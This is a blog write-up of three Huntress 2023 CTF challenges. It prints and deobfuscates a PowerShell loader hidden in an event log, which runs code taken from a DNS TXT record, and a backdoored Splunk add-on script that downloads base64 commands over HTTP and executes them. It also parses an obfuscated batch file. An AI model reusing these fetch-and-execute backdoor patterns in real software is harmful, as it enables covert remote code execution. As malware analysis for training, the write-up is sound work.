17:56:06-rurik@~/CTF/Huntress_2023/done/blog$ python /Users/rurik//Development/python-evtx/scripts/evtx_dump.py  ./Application\ Logs.evtx | grep -C5 -i chain

<Execution ProcessID="9488" ThreadID="0"></Execution><Channel>Application</Channel><Computer>DESKTOP-JU2PNRI</Computer><Security UserID=""></Security></System><EventData><Data>&lt;string&gt;Windows Installer installed the product. Product Name: The Texas Chain Saw Massacre (1974). Product Version: 8.0.382.5. Product Language: English. Director: Tobe Hooper. Installation success or error status: 0.&lt;/string&gt;</Data><Binary>KCgnLiAoIFpUNkVOdjpDb01TcEVjWzQsMjQsJysnMjVdLWpvaW5oeDZoeDYpKCBhNlQgWlQ2KCBTZXQtdmFyaWFCbGUgaHg2T2ZTaHg2IGh4Nmh4NilhNlQrICggW1N0cmlOZycrJ10gW3JFR2VYXTo6bUF0Y2hlUyggYTZUICkpNDIxXVJBaENbLGh4NmZLSWh4NmVDQUxQZVItICA5M11SQWhDWywpODldUkFoQ1srODRdUkFoQ1srOThdUkFoQ1soIEVjYWxQZVJDLSAgNjNdUkFoQ1ssaHg2a3dsaHg2RWNhbFBlUkMtICApaHg2KWJoeDYraHg2MFliMFloeDYraHg2bmlPai1dNTIsaHg2K2h4NjQyLGh4NisnKydoeDY0W2NlaHg2K2h4NnBoeDYraHg2U01vQzpWbmh4NitoeDZla3dsICggaHg2K2h4Ni4gZktJICkgKERuRU9UREFoeDYraHg2ZWh4NitoeDZyLil9ICkgaHg2KycrJ2h4NmlpY3NBOmh4NitoeDY6XUduaWRPY05oeDYraHg2ZS5oeDYraHg2VGh4NitoeDZ4ZXRoeDYraHg2Lmh4NitoeDZNRVRzeXNbaHg2K2h4NiAsX2t3aHg2K2gnKyd4NmwgKFJFRGh4NitoeDZBZVJtYWVydFMubycrJ0loeDYraHg2IHRoeDYraHg2Q2h4NicrJytoeDZlamJPLVdoJysneDYraHg2RW4geyBIQ2FFUm9GaHg2K2h4NmZLSSkgc1NFUnBNJysnb0NlaHg2K2h4JysnNmRoeDYraHg2OjpoeDYraHg2XScrJ2VkT01oeDYraHg2Jysnbk9pc1NFclBNb2NoeDYraHg2Lk5vSVNTZXJoeDYraHg2cE1PYy5vaVssICkgYicrJzBZaHg2K2h4Nj09d0R5RDRwK1MnKydzL2wvaHg2K2h4NmkrNUd0YXRKS3lmTmpPaHg2KycrJ2h4NjNoeDYraHg2M2h4NitoeDY0Vmh4NitoeDZ2ajZ3UnlSWGUxeHkxcEIwaHg2K2h4NkFYVkxNZ093WWh4NitoeDYvL2h4NitoeDZXb21oeDYraHg2eicrJ3pVaHg2K2h4NnRCaHg2K2h4NnN4L2llMHJWWjdoeDYraHg2eGNMaW93V01HRVZqazdKTWZ4Vm11c3poeDYraHg2T1QzWGtLdTlUdk9zcmh4NitoeDZiYmh4NitoeDZjYmh4NitoeDZHeVo2Yy9nWWh4NitoeDZOcGlsaHg2K2h4NkJLN3g1aHg2K2h4NlBsY2h4NitoeDY4cVV5T2hCWWh4NitoeDZWZWNqTkxXNDJZak04U3d0QWh4NitoeDZhUjhJaHg2K2h4Nk9oeDYraHg2d2h4NitoeDZtaHg2K2h4NjZoeDYraHg2VXdXTm1XekN3JysnaHg2K2h4NlZyU2h4NitoeDZyN0loeDYraHg2VDJoeDYraHg2azZNajFNdWh4NitoeDZLaHg2K2h4NlQnKycvb1JoeDYraHg2TzVCS0s4UjNOaERoeDYraHg2b20yQWh4NitoeDZHWXBoeDYraHg2eWFoeDYraHg2VGFOZzhEQW5lTm9lU2poeDYraCcrJ3g2dWdrVEJGVGNDUGFTSDBRanBGeXdoeDYrJysnaHg2YVF5aHgnKyc2K2h4Nkh0UFVHJysnaHgnKyc2K2h4NkRMMEJLM2h4NitoJysneDZsQ2xySEF2aHg2K2gnKyd4NjRHT3BWS2h4NitoeDZVTmh4NitoeDZtR3pJRGVyYUV2bHBjJysna0M5RUdoeDYraHg2Z0lhZjk2alNtU2h4NicrJytoeDZNaGh4NitoeDZoaHg2K2h4NlJmSTcyaHg2K2h4Nm9IelVrRHNab1Q1aHg2K2h4Nm5oeDYraHg2YzdNRDhXMzFYcScrJ0toeDYraHg2ZDRkYnRoeDYraHg2YnRoMVJkU2lnRWFFaHg2K2h4NkpORVJNTFV4VicrJ2h4NitoeDZNRTRQSnRVaHg2K2h4NnRTSUpVWmZaaHg2K2h4NkVFaHg2K2h4NkFoeDYraHg2SnNUZERaTmJoeDYraHg2MFkoZ25pUlRTNGh4NitoeDY2ZXNoJysneDYraHg2YUJtb1JGOjpddFJldm5PaHg2K2h4NkNbXU1BZXJ0c1lyT21lTS5PaS5tRVRTWXNbIChNYUVyaHg2K2h4NnRoeDYraHg2c0V0QUxmZUQuTk9oeDYraHg2SXNTJysnZXJQbW8nKydjLk9JLm1laHg2K2h4NlRzWVNoeDYnKycraHg2IGh4NitoeDYgdENlamJPLVdFaHg2K2h4Nm4gKCBoeDYoKChubycrJ0lzc2VScFgnKydlLWVrb3ZuaSBhNlQsaHg2Lmh4NixoeDZSaWdodFRvTEVGdGh4NiApIFJZY2ZvckVhY2h7WlQ2XyB9KSthNlQgWlQ2KCBzViBoeDZvRnNoeDYgaHg2IGh4NilhNlQgKSAnKSAgLWNSRXBMQUNFIChbY0hBcl05MCtbY0hBcl04NCtbY0hBcl01NCksW2NIQXJdMzYgLXJFUGxBY2UnYTZUJyxbY0hBcl0zNCAgLXJFUGxBY2UgICdSWWMnLFtjSEFyXTEyNCAtY1JFcExBQ0UgIChbY0hBcl0xMDQrW2NIQXJdMTIwK1tjSEFyXTU0KSxbY0hBcl0zOSkgfC4gKCAkdkVSYm9TRXByZUZlUmVuQ2UudE9TdHJJTkcoKVsxLDNdKyd4Jy1KT2luJycp</Binary></EventData></Event>


Decoding this Base64 created a blob of obvious PowerShell script:

(('. ( ZT6ENv:CoMSpEc[4,24,'+'25]-joinhx6hx6)( a6T ZT6( Set-variaBle hx6OfShx6 hx6hx6)a6T+ ( [StriNg'+'] [rEGeX]::mAtcheS( a6T ))421]RAhC[,hx6fKIhx6eCALPeR-  93]RAhC[,)89]RAhC[+84]RAhC[+98]RAhC[( EcalPeRC-  63]RAhC[,hx6kwlhx6EcalPeRC-  )hx6)bhx6+hx60Yb0Yhx6+hx6niOj-]52,hx6+hx642,hx6+'+'hx64[cehx6+hx6phx6+hx6SMoC:Vnhx6+hx6ekwl ( hx6+hx6. fKI ) (DnEOTDAhx6+hx6ehx6+hx6r.)} ) hx6+'+'hx6iicsA:hx6+hx6:]GnidOcNhx6+hx6e.hx6+hx6Thx6+hx6xethx6+hx6.hx6+hx6METsys[hx6+hx6 ,_kwhx6+h'+'x6l (REDhx6+hx6AeRmaertS.o'+'Ihx6+hx6 thx6+hx6Chx6'+'+hx6ejbO-Wh'+'x6+hx6En { HCaERoFhx6+hx6fKI)sSERpM'+'oCehx6+hx'+'6dhx6+hx6::hx6+hx6]'+'edOMhx6+hx6'+'nOisSErPMochx6+hx6.NoISSerhx6+hx6pMOc.oi[, ) b'+'0Yhx6+hx6==wDyD4p+S'+'s/l/hx6+hx6i+5GtatJKyfNjOhx6+'+'hx63hx6+hx63hx6+hx64Vhx6+hx6vj6wRyRXe1xy1pB0hx6+hx6AXVLMgOwYhx6+hx6//hx6+hx6Womhx6+hx6z'+'zUhx6+hx6tBhx6+hx6sx/ie0rVZ7hx6+hx6xcLiowWMGEVjk7JMfxVmuszhx6+hx6OT3XkKu9TvOsrhx6+hx6bbhx6+hx6cbhx6+hx6GyZ6c/gYhx6+hx6Npilhx6+hx6BK7x5hx6+hx6Plchx6+hx68qUyOhBYhx6+hx6VecjNLW42YjM8SwtAhx6+hx6aR8Ihx6+hx6Ohx6+hx6whx6+hx6mhx6+hx66hx6+hx6UwWNmWzCw'+'hx6+hx6VrShx6+hx6r7Ihx6+hx6T2hx6+hx6k6Mj1Muhx6+hx6Khx6+hx6T'+'/oRhx6+hx6O5BKK8R3NhDhx6+hx6om2Ahx6+hx6GYphx6+hx6yahx6+hx6TaNg8DAneNoeSjhx6+h'+'x6ugkTBFTcCPaSH0QjpFywhx6+'+'hx6aQyhx'+'6+hx6HtPUG'+'hx'+'6+hx6DL0BK3hx6+h'+'x6lClrHAvhx6+h'+'x64GOpVKhx6+hx6UNhx6+hx6mGzIDeraEvlpc'+'kC9EGhx6+hx6gIaf96jSmShx6'+'+hx6Mhhx6+hx6hhx6+hx6RfI72hx6+hx6oHzUkDsZoT5hx6+hx6nhx6+hx6c7MD8W31Xq'+'Khx6+hx6d4dbthx6+hx6bth1RdSigEaEhx6+hx6JNERMLUxV'+'hx6+hx6ME4PJtUhx6+hx6tSIJUZfZhx6+hx6EEhx6+hx6Ahx6+hx6JsTdDZNbhx6+hx60Y(gniRTS4hx6+hx66esh'+'x6+hx6aBmoRF::]tRevnOhx6+hx6C[]MAertsYrOmeM.Oi.mETSYs[ (MaErhx6+hx6thx6+hx6sEtALfeD.NOhx6+hx6IsS'+'erPmo'+'c.OI.mehx6+hx6TsYShx6'+'+hx6 hx6+hx6 tCejbO-WEhx6+hx6n ( hx6(((no'+'IsseRpX'+'e-ekovni a6T,hx6.hx6,hx6RightToLEFthx6 ) RYcforEach{ZT6_ })+a6T ZT6( sV hx6oFshx6 hx6 hx6)a6T ) ')-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'a6T',[cHAr]34-rEPlAce'RYc',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)|.($vERboSEpreFeRenCe.tOStrING()[1,3]+'x'-JOin'')

There's a lot of junk in there, which is standard for obfuscated PowerShell. There are many automated ways of doing this. But, I'm a sucker for manual deobfuscation...

So, first we look for string replacement routines. These are seen at the bottom:

-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'a6T',[cHAr]34-rEPlAce'RYc',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)

As usual with obfuscated PowerShell, remove all the literal ('+') symbols, which exist only to break up continuous strings, and then perform the above replacements. The resulting output has another layer of ('+') characters to remove. Once completed, it produces:

(('. ( $ENv:CoMSpEc[4,24,25]-join'')( " $( Set-variaBle 'OfS''')"+ ( [StriNg] [rEGeX]::mAtcheS( " ))421]RAhC[,'fKI'eCALPeR-  93]RAhC[,)89]RAhC[+84]RAhC[+98]RAhC[( EcalPeRC-  63]RAhC[,'kwl'EcalPeRC-  )')b0Yb0YniOj-]52,42,4[cepSMoC:Vnekwl(.fKI)(DnEOTDAer.)})iicsA::]GnidOcNe.Txet.METsys[,_kwl(REDAeRmaertS.oItCejbO-WEn{HCaERoFfKI)sSERpMoCed::]edOMnOisSErPMoc.NoISSerpMOc.oi[,)b0Y==wDyD4p+Ss/l/i+5GtatJKyfNjO334Vvj6wRyRXe1xy1pB0AXVLMgOwY//WomzzUtBsx/ie0rVZ7xcLiowWMGEVjk7JMfxVmuszOT3XkKu9TvOsrbbcbGyZ6c/gYNpilBK7x5Plc8qUyOhBYVecjNLW42YjM8SwtAaR8IOwm6UwWNmWzCwVrSr7IT2k6Mj1MuKT/oRO5BKK8R3NhDom2AGYpyaTaNg8DAneNoeSjugkTBFTcCPaSH0QjpFywaQyHtPUGDL0BK3lClrHAv4GOpVKUNmGzIDeraEvlpckC9EGgIaf96jSmSMhhRfI72oHzUkDsZoT5nc7MD8W31XqKd4dbtbth1RdSigEaEJNERMLUxVME4PJtUtSIJUZfZEEAJsTdDZNb0Y(gniRTS46esaBmoRF::]tRevnOC[]MAertsYrOmeM.Oi.mETSYs[(MaErtsEtALfeD.NOIsSerPmoc.OI.meTsYStCejbO-WEn('(((noIsseRpXe-ekovni ",'.','RightToLEFt' ) |forEach{$_ })+" $( sV 'oFs''')" ) ')-cREpLACE([cHAr]90+[cHAr]84+[cHAr]54),[cHAr]36-rEPlAce'"',[cHAr]34-rEPlAce'|',[cHAr]124-cREpLACE([cHAr]104+[cHAr]120+[cHAr]54),[cHAr]39)|.($vERboSEpreFeRenCe.tOStrING()[1,3]+'x'-JOin'')


From here there is a hard to see 'RightToLEFt' near the end. This uses the PowerShell reverse text function, used for some language sets. In effect, it basically reads portions of the script in reverse. Reversing that code prior, as you can easily see 'invoke-e' backwards, displays:

invoke-eXpRessIon(((\' ( nEW-ObjeCt  SYsTem.IO.comPreSsION.DefLAtEstrEaM( [sYSTEm.iO.MemOrYstreAM][COnveRt]::FRomBase64STRing(Y0bNZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw==Y0b ) ,[io.cOMpreSSIoN.coMPrESsiOnMOde]::deCoMpRESs )IKfFoREaCH { nEW-ObjeCt Io.StreamReADER( lwk_, [sysTEM.texT.eNcOdinG]::Ascii ) }).reADTOEnD( ) IKf . ( lwkenV:CoMSpec[4,24,25]-jOinY0bY0b)\')-CRePlacE\'lwk\',[ChAR]36-CRePlacE([ChAR]89+[ChAR]48+[ChAR]98),[ChAR]39-RePLACe\'IKf\',[ChAR]124))


More string replacement!

-creplace"lwk","$"-creplace"Y0b","'"-replace"IKf","|"


That makes it even more understandable as we get closer to the core code.

invoke-eXpRessIon(((\' ( nEW-ObjeCt  SYsTem.IO.comPreSsION.DefLAtEstrEaM( [sYSTEm.iO.MemOrYstreAM][COnveRt]::FRomBase64STRing('NZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw==' ) ,[io.cOMpreSSIoN.coMPrESsiOnMOde]::deCoMpRESs )|FoREaCH { nEW-ObjeCt Io.StreamReADER( $_, [sysTEM.texT.eNcOdinG]::Ascii ) }).reADTOEnD( ) | . ( $enV:CoMSpec[4,24,25]-jOin'')\')


From here, we can basically read and understand the leftover code. A call to FromBase64String on a long Base64 string, which is then eventually fed into system.io.compression.deflatestream. This can easily be done in Python:

>>>data='NZDdTsJAEEZfZUJIStUtJP4EMVxULMRENJEaEgiSdR1htbtbd4dKqX13W8DM7cn5ToZsDkUzHo27IfRhhMSmSj69faIgGE9CkcplvEareDIzGmNUKVpOG4vAHrlCl3KB0LDGUPtHyQawyFpjQ0HSaPCcTFBTkgujSeoNenAD8gNaTaypYGA2moDhN3R8KKB5ORo/TKuM1jM6k2TI7rSrVwCzWmNWwU6mwOI8RaAtwS8MjY24WLNjceVYBhOyUq8clP5x7KBlipNYg/c6ZyGbcbbrsOvT9uKkX3TOzsumVxfMJ7kjVEGMWwoiLcx7ZVr0ei/xsBtUzzmoW//YwOgMLVXA0Bp1yx1eXRyRw6jvV433OjNfyKJtatG5+i/l/sS+p4DyDw=='>>>dec=base64.b64decode(data)>>>decb'5\x90\xddN\xc2@\x10F_eBHJ\xd5-$\xfe\x041\\T,\xc4D4\x91\x1a\x12\x08\x92u\x1da\xb5\xbb[w\x87J\xa9}w[\xc0\xcc\xed\xc9\xf9N\x86l\x0eE3\x1e\x8d\xbb!\xf4a\x84\xc4\xa6J>\xbd}\xa2 \x18OB\x91\xcae\xbcF\xabx23\x1acT)ZN\x1b\x8b\xc0\x1e\xb9B\x97r\x81\xd0\xb0\xc6P\xfbG\xc9\x06\xb0\xc8ZcCA\xd2h\xf0\x9cLPS\x92\x0b\xa3I\xea\rzp\x03\xf2\x03ZM\xac\xa9``6\x9a\x80\xe17t|(\xa0y9\x1a?L\xab\x8c\xd63:\x93d\xc8\xee\xb4\xabW\x00\xb3ZcV\xc1N\xa6\xc0\xe2<E\xa0-\xc1/\x0c\x8d\x8d\xb8X\xb3cq\xe5X\x06\x13\xb2R\xaf\x1c\x94\xfeq\xec\xa0e\x8a\x93X\x83\xf7:g!\x9bq\xb6\xeb\xb0\xeb\xd3\xf6\xe2\xa4_t\xce\xce\xcb\xa6W\x17\xcc\'\xb9#TA\x8c[\n"-\xcc{eZ\xf4z/\xf1\xb0\x1bT\xcf9\xa8[\xff\xd8\xc0\xe8\x0c-U\xc0\xd0\x1au\xcb\x1d^]\x1c\x91\xc3\xa8\xefW\x8d\xf7:3_\xc8\xa2mj\xd1\xb9\xfa/\xe5\xfe\xc4\xbe\xa7\x80\xf2\x0f'>>>zlib.decompress(dec)Traceback(mostrecentcalllast):File"<stdin>",line1,in<module>zlib.error:Error-3whiledecompressingdata:incorrectheadercheck


Oh snap! Wrong data type? Nope, this is common with zlib data if there is no header. You eventually learn that you just need to change the wbits to a number from -8 to -15, as noted in its documentation. (https://docs.python.org/2/library/zlib.html#zlib.decompress)

>>>zlib.decompress(dec.-8)b'try {$TGM8A = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" -ErrorAction \'silentlycontinue\' ; if ($error.Count -eq 0) {  $5GMLW = (Resolve-DnsName eventlog.zip -Type txt | ForEach-Object { $_.Strings } ); if ($5GMLW -match \'^[-A-Za-z0-9+/]*={0,3}$\') {  [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($5GMLW))  | Invoke-Expression } } } catch { }'


Wait, what? This stuck me for longer than it should have. It's calling Resolve-DnsName, but that expects a domain name not a filename. Since I'm not on Windows I did not even try to run it. Eventually I broke down and tried it in a Windows VM and realized ... eventlog.zip was a literal domain name not a file name. Going back to my terminal and pulling the TXT record showed more Base64:

$ host -t txt eventlog.zipeventlog.zip descriptive text "U3RhcnQtUHJvY2VzcyAiaHR0cHM6Ly95b3V0dS5iZS81NjFubmQ5RWJzcz90PTE2IgojZmxhZ3s0MDk1MzczNDdjMmZhZTAxZWY5ODI2YzI1MDZhYzY2MH0jCg=="


This further Base64 decodes to:

'Start-Process "https://youtu.be/561nnd9Ebss?t=16"\n#flag{409537347c2fae01ef9826c2506ac660}#\n', 

This is the flag and a video of a pleasant chain saw sound.


Backdoored Splunk



This was one of the more unique challenges. Provided was an archive for a Splunk TA (Technology Add-on), a.k.a plugin. I don't know much about Splunk, except that most of its customers can no longer afford it, so this was an interesting challenge.

Honestly, I had no clue what I was looking at. Calvin and Hobbes are always here to look on in equal surprise.


In quick review I noticed most of the files were last modified in May 2023, as their mtimes were retained in their archive.

18:09:29-rurik@~/CTF/Huntress_2023/done/Splunk_TA_windows$ stat -x README.txt
  File: "README.txt"  Size: 170          FileType: Regular File  Mode: (0644/-rw-r--r--)         Uid: (  501/   rurik)  Gid: (   20/   staff)Device: 1,4   Inode: 32168160    Links: 1Access: Sat Mar  9 18:06:12 2024Modify: Wed May 10 09:27:38 2023Change: Sat Mar  9 18:06:12 2024 Birth: Wed May 10 09:27:38 2023

There are two ways to pull on that thread. The more complex is to iterate all of the mtimes to find outliers. This helped reduce the large set down to just 11 files. Furthermore, the 25 Sep time was only for a single file. That is our file of interest.

rurik@~/Splunk_TA_windows$ ls -lR | awk '{print $6, $7, $8}' | sort | uniq

May 10 2023Sep 19 13:10Sep 25 12:18rurik@~/Splunk_TA_windows$ ls -lR | grep "Sep "drwx------   3 rurik  staff     96 Sep 19 13:10 LICENSESdrwx------   3 rurik  staff     96 Sep 19 13:10 READMEdrwx------   3 rurik  staff     96 Sep 19 13:10 appserverdrwx------  12 rurik  staff    384 Sep 19 13:10 bindrwx------  11 rurik  staff    352 Sep 19 13:10 defaultdrwx------  33 rurik  staff   1056 Sep 19 13:10 lookupsdrwx------   3 rurik  staff     96 Sep 19 13:10 metadatadrwx------   8 rurik  staff    256 Sep 19 13:10 staticdrwx------   4 rurik  staff    128 Sep 19 13:10 staticdrwx------  11 rurik  staff    352 Sep 19 13:10 powershell-rw-r--r--   1 rurik  staff   6044 Sep 25 12:18 nt6-health.ps1


The method I actually used after determining the time difference was quick and easy, using the find command. Specify the -mtime option to limit output to only files modified within the last X number of days. An arbitrary number can be used and tuned in. For example, for only files modified within the last 200 days, and then more details on those files:

18:25:53-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ find ./ -mtime -200
././/lookups.//bin.//bin/powershell.//bin/powershell/nt6-health.ps1.//LICENSES.//default.//README.//static.//appserver.//appserver/static.//metadata18:27:07-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ stat `find ./ -mtime -200`16777220 32168132 drwx------ 15 rurik staff 0 480  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:21 2024""Sep 19 13:10:10 2023" 4096 0 0 ./16777220 32168186 drwx------ 33 rurik staff 0 1056 "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//lookups16777220 32168165 drwx------ 12 rurik staff 0 384  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//bin16777220 32168168 drwx------ 11 rurik staff 0 352  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//bin/powershell16777220 32168171 -rw-r--r-- 1  rurik staff 0 6044 "Mar  9 18:06:12 2024""Sep 25 12:18:25 2023""Mar  9 18:06:12 2024""Sep 25 12:18:25 2023" 4096 16 0 .//bin/powershell/nt6-health.ps116777220 32168136 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//LICENSES16777220 32168149 drwx------ 11 rurik staff 0 352  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//default16777220 32168133 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//README16777220 32168138 drwx------ 8  rurik staff 0 256  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//static16777220 32168145 drwx------ 3  rurik staff 0 96.  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//appserver16777220 32168146 drwx------ 4  rurik staff 0 128  "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//appserver/static16777220 32168163 drwx------ 3  rurik staff 0 96   "Mar  9 18:06:12 2024""Sep 19 13:10:10 2023""Mar  9 18:06:12 2024""Sep 19 13:10:10 2023" 4096 0 0 .//metadata


This also reduces the file collection down to a smaller set and, eventually, to the only non-directory: nt6-health.ps1.

Contained within this file was almost 200 lines of PowerShell, none of which I understood. But, you don't need to. You can easily just glance and find things that jump out as unusual. Doing so I found these lines:

## Windows Version and Build ##$WindowsInfo=Get-Item"HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion"# $PORT below is dynamic to the running service of the `Start` button$OS=@($html=(Invoke-WebRequesthttp://chal.ctf.games:$PORT-Headers
    @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXR
    lX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")}-UseBasicParsing).Contentif($html-match'<!--(.*?)-->'){$value=$matches[1]$command=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($value))Invoke-Expression$command})$OSSP=$WindowsInfo.GetValue("CSDVersion")$WinVer=$WindowsInfo.GetValue("CurrentVersion")$WinBuild=$WindowsInfo.GetValue("CurrentBuildNumber")$OSVER="$WinVer ($WinBuild)"

A call to Invoke-WebRequest to a domain used by the challenge with a specific auth login. The user name and password are expected within that Base64 blob:

backdoor:use_this_to_authenticate_with_the_deployed_http_server

OK, so just make a connection?

5:14:21-rurik@~/CTF/Huntress_2023/Splunk_TA_windows$ curl  -H "Authorization: Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==" http://chal.ctf.games:31106

<!-- ZWNobyBmbGFnezYwYmIzYmZhZjcwM2UwZmEzNjczMGFiNzBlMTE1YmQ3fQ== �

We can refer back to the earlier PowerShell that shows it performing a RegEx that mostly matches the result (any error here could be a result of my poor notes). Another Base64 decoding shows the flag:

>>>base64.b64decode('ZWNobyBmbGFnezYwYmIzYmZhZjcwM2UwZmEzNjczMGFiNzBlMTE1YmQ3fQ==')b'echo flag{60bb3bfaf703e0fa36730ab70e115bd7}'


Batchfuscation


One of my favorite challenges. A batch script that is very simple in design, but confusing to review. This is a challenge of pure text substitution, one of my favorite hobbies.

You'll notice over 11,000 lines of script that appear to grow in lengths and complexity line-by-line. 


The idea seems simple and easy to start. If "xeegh" is "/", then find/replace. In DOS/Windows environment variables are referenced by percent signs, so a replacement of "%xeegh%" to "/". This works for the first few, but that then exposes more complex lines like these:


set/abpquuu=4941956%%4941859cmd/cexit%bpquuu%setgrtoy=%=exitcodeAscii%

Here you see a complex operation to acquire a single byte. The set command is used with the /a argument to evaluate a math equation. Here, "4941956 %% 4941859" is a modulo operator that results in the number 97, or ASCII char "a". The script then runs "cmd /c exit %var%". This simply runs a new instance of cmd.exe solely to run the command "exit 97". Once a command terminal is closed, or technically any program within it, Windows stores it's exit code. This is normal 0 for normal exit, but the previous command line forces it to return back the ASCII equivalent of the number passed to it.

That is three lines of code to create:

set grtoy=a

Later on, the code obfuscation just grows out of control with eventual hundreds of substitutions required. This is a job for automation. We can parse the script line-by-line and interpret each result. As a single character assignment requires multiple lines, we can set a simple state to treat them as sets. First, parse the modulo equation out by searching for the presence of "set /a", parsing the numbers, and running an eval() on the equation. Something you would absolutely never do in real life, of course. Yet, everyone does. Carry forward that byte until another set is found. If this line contains "exitcodeAscii", and there is a byte carried forward, then parse the variable name and assign the byte. And remember to reset the state of the carried byte so that the code knows to treat the next line as a new block.

replacements={}defreplace_strs(code):new_code=codeforkey,valueinreplacements.items():new_code=new_code.replace(key,value)returnnew_codedefparse(code):globalreplacementscarry_byte_val=''fororig_lineincode:line=orig_line.strip('\n')line=replace_strs(line)ifline[:7]=='set /a ':equation=line.split('=')[1]equation=equation.replace(' %% ',' % ')carry_byte_val=chr(eval(equation))line=line.replace('/a ','')elifline[:3]=='set':var=line.split('set')[1].split('=')[0].strip()if'exitcodeAscii'inlineandcarry_byte_val:value=carry_byte_valcarry_byte_val=''else:value=line.split('=')[1][0]replacements['%{}%'.format(var)]=valueprint(line)data=open('batchfuscation','r').readlines()parse(data)


When run, more lines of obfuscation appear. 

remsetxjnhkbhki=piyyreuxgwvafwtz::setkyqjrobznfcjrlogdhalniqwjvxdtklyjzajcdkulwrsqrgdhcmbbpbz=dflnnmopuyiavetpibufiidlremsetscahzpgynzthblbrgbfkzacckwkkjevkqsjkocewwpoofuxuoylvpl=dgzmfpwso


However, these are all preceded with a "rem" (Batch shorthand for a remark, or comment) or a "::", which is used by Batch for labels, allowing for goto functionality. None of these matter as they don't actually do anything. However, upon filtering those from the output, there was nothing that popped out as a flag. Going back to the new script, over 1,000 lines long, there were no duplicate lines. Maybe there is another pattern in play, so I sort the output and page through it. Immediately, the key area jumped out:

::sethqtjrafvwrwtfdfpzcfrxld=dqtitaarfravijxdkkdozhlferpfhklzbqo::sethrklgmqdpnofocaepmobfxglgoypff=zgfwuaniobviqwpzjbohziguekxjujcvunaeejsmdrkivhipmvohh::setflag_character12=e::setflag_character13=3::setflag_character14=d::setflag_character15=0::setflag_character16=b::setflag_character17=5::setflag_character18=b::setflag_character19=f::setflag_character1=f

Excellent. The flag being built one byte at a time, though out of order. I can now add that into my script and build the flag. Here is where many people get caught in Python. Strings are immutable. You cannot make a string and change individual bytes in it. Instead, you make a character array like "value = []*50" and convert to a string later. 

replacements={}defreplace_strs(code):new_code=codeforkey,valueinreplacements.items():new_code=new_code.replace(key,value)returnnew_codedefparse(code):globalreplacementsflag=['']*50carry_byte_val=''fororig_lineincode:line=orig_line.strip('\n')line=replace_strs(line)ifline[:7]=='set /a ':equation=line.split('=')[1]equation=equation.replace(' %% ',' % ')carry_byte_val=chr(eval(equation))line=line.replace('/a ','')elifline[:3]=='set':var=line.split('set')[1].split('=')[0].strip()if'exitcodeAscii'inlineandcarry_byte_val:value=carry_byte_valcarry_byte_val=''else:value=line.split('=')[1][0]replacements['%{}%'.format(var)]=valueelif'flag_character'inline:pos=int(line.split('=')[0].split('flag_character')[1])flag_byte=line.split('=')[1].strip()flag[pos]=flag_bytereturnflagdata=open('batchfuscation','r').readlines()flag=parse(data)print(''.join(flag))

